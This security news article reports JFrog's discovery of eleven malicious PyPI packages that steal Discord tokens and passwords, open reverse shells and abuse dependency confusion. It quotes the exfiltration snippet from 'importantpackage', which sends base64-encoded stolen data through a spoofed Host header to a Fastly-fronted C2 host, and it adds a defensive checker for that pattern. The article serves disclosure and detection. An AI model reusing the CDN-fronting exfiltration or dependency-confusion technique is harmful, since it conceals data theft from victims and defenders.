Researchers find 11 malicious Python packages in the PyPI repository that can steal access tokens, passwords and create backdoors

Security specialists from the firm JFrog report the discovery of 11 malicious Python packages in the Python Package Index (PyPI) repository, apparently designed for the theft of access tokens to platforms such as Discord, in addition to intercepting passwords and deploying dependency confusion attacks.

The list of malicious packages detected in this research is shown below:

  • importantpackage / important-package
  • pptest
  • ipboards
  • owlmoon
  • DiscordSafety
  • trrfab
  • 10Cent10/10Cent11
  • yandex-yt
  • yiffparty

Among these packages, experts note that “importantpackage”, “10Cent10” and “10Cent11” appear to establish a reverse shell on the compromised machine. In addition, “importantpackage” abuses the CDN’s TLS termination for data exfiltration, using the Fastly CDN to hide its malicious communications with the C&C server.

According to the report, the communication code for this malware is:

from urllib import request

# b64_payload holds the base64-encoded stolen data (built elsewhere in the package)
url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload

# The Host header names a different host than the URL: the CDN routes the request to the C2
r = request.Request(url, headers={"Host": "psec.forward.io.global.prod.fastly.net"})

The researchers note that this code causes an HTTPS request to be sent to pypi.python.org which is subsequently redirected by the CDN as an HTTP request to the C2 server psec.forward.io.global.prod.fastly.net.
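The tell-tale sign in that snippet is a Host header that does not match the host in the URL. The following static check, an added example that is not part of JFrog's report or the malware, walks a Python source file with the ast module and flags every Request() call whose literal URL host differs from the Host header; the SAMPLE source is constructed here for illustration.

```python
import ast
from urllib.parse import urlsplit

# Constructed sample: the pattern from the article plus a benign call with a matching Host
SAMPLE = '''
from urllib import request
url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload
r = request.Request(url, headers={"Host": "psec.forward.io.global.prod.fastly.net"})
ok = request.Request("https://example.org/api", headers={"Host": "example.org"})
'''

def _literal_prefix(node):
    """Leading string-literal part of a str or `a + b + ...` expression, else None."""
    if isinstance(node, ast.Constant) and isinstance(node.value, str):
        return node.value
    if isinstance(node, ast.BinOp) and isinstance(node.op, ast.Add):
        left = _literal_prefix(node.left)
        if left is None:
            return None
        return left + (_literal_prefix(node.right) or "")  # stop at first non-literal
    return None

def _host_header(call):
    """Value of a literal 'Host' key in a headers={...} keyword argument, else None."""
    for kw in call.keywords:
        if kw.arg == "headers" and isinstance(kw.value, ast.Dict):
            for k, v in zip(kw.value.keys, kw.value.values):
                if (isinstance(k, ast.Constant) and str(k.value).lower() == "host"
                        and isinstance(v, ast.Constant)):
                    return str(v.value)
    return None

def find_host_mismatches(source):
    """Return (lineno, url_host, header_host) for calls whose Host header != URL host."""
    tree = ast.parse(source)
    assigned = {}  # variable name -> literal prefix of the string assigned to it
    for node in ast.walk(tree):  # first pass: simple `name = "..." + ...` assignments
        if isinstance(node, ast.Assign) and len(node.targets) == 1 \
                and isinstance(node.targets[0], ast.Name):
            prefix = _literal_prefix(node.value)
            if prefix is not None:
                assigned[node.targets[0].id] = prefix
    findings = []
    for node in ast.walk(tree):  # second pass: calls carrying an explicit Host header
        if not (isinstance(node, ast.Call) and node.args):
            continue
        host = _host_header(node)
        arg = node.args[0]
        url = assigned.get(arg.id) if isinstance(arg, ast.Name) else _literal_prefix(arg)
        url_host = urlsplit(url).hostname if url else None
        if host and url_host and url_host.lower() != host.lower():
            findings.append((node.lineno, url_host, host))
    return findings
```

Run it over a package's sources before installation; a hit is not proof of malice, but a mismatched Host header on a CDN-hosted domain is the exact indicator described above and deserves manual review.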

The dependency confusion technique involves uploading malicious packages to public repositories under the same names as legitimate internal private packages, but with a higher version number. This technique is effective at tricking package managers into downloading and installing the malicious modules in place of the internal ones.

The researchers conclude by mentioning that while this is an attack similar to other hacking techniques, it does give threat actors a way to act stealthily, plus it could function as the prelude to subsequent attacks.

To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.